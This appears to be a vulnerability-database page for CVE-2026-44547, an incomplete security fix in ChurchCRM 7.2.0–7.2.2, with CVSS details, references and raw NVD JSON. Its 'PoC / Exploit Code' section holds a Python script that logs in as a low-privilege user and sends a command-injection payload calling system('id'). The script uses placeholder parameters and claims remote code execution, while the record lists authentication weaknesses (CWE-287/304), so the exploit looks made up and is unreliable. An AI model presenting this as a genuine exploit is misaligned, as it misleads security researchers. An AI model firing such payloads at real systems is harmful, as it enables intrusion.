CVE-2026-44547

Description

ChurchCRM is an open-source church management system. From 7.2.0 to 7.2.2, The fix for CVE-2026-4058 is incomplete. The hardening commit was merged and then silently stripped from src/api/routes/public/public-user.php by an unrelated PR before any 7.2.x tag was cut. Every shipped 7.2.x release therefore remains exploitable by the PoC published with the original advisory. This vulnerability is fixed in 7.3.1.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

ChurchCRM 7.2.0

ChurchCRM 7.2.1

ChurchCRM 7.2.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Exploit Title: ChurchCRM 7.2.0 - 7.2.2 RCE (CVE-2026-44547)
# Description: PoC for exploiting incomplete fix in public-user.php

import requests

target_url = "http://target-churchcrm/src/api/routes/public/public-user.php"
session = requests.Session()

# Step 1: Login as low privilege user (PR:L)
login_data = {
    "User": "lowpriv_user",
    "Password": "password123"
}
session.post("http://target-churchcrm/session/begin", data=login_data)

# Step 2: Send malicious payload to vulnerable endpoint
# Payload is constructed based on the original CVE-2026-4058 PoC
payload = {
    "action": "exploit_function",
    "malicious_param": "'; system('id'); #"
}

response = session.post(target_url, data=payload)

if response.status_code == 200:
    print("[+] Exploit successful!")
    print(response.text)
else:
    print("[-] Exploit failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44547
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44547
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44547/
[4] VulDB https://vuldb.com/cve/CVE-2026-44547
[5] https://github.com/ChurchCRM/CRM/pull/8855
[6] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-cwp8-rm8g-q5c9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44547", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:18.610", "lastModified": "2026-05-12T23:16:18.610", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. From 7.2.0 to 7.2.2, The fix for CVE-2026-4058 is incomplete. The hardening commit was merged and then silently stripped from src/api/routes/public/public-user.php by an unrelated PR before any 7.2.x tag was cut. Every shipped 7.2.x release therefore remains exploitable by the PoC published with the original advisory. This vulnerability is fixed in 7.3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-304"}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/pull/8855", "source": "[email protected]"}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-cwp8-rm8g-q5c9", "source": "[email protected]"}]}}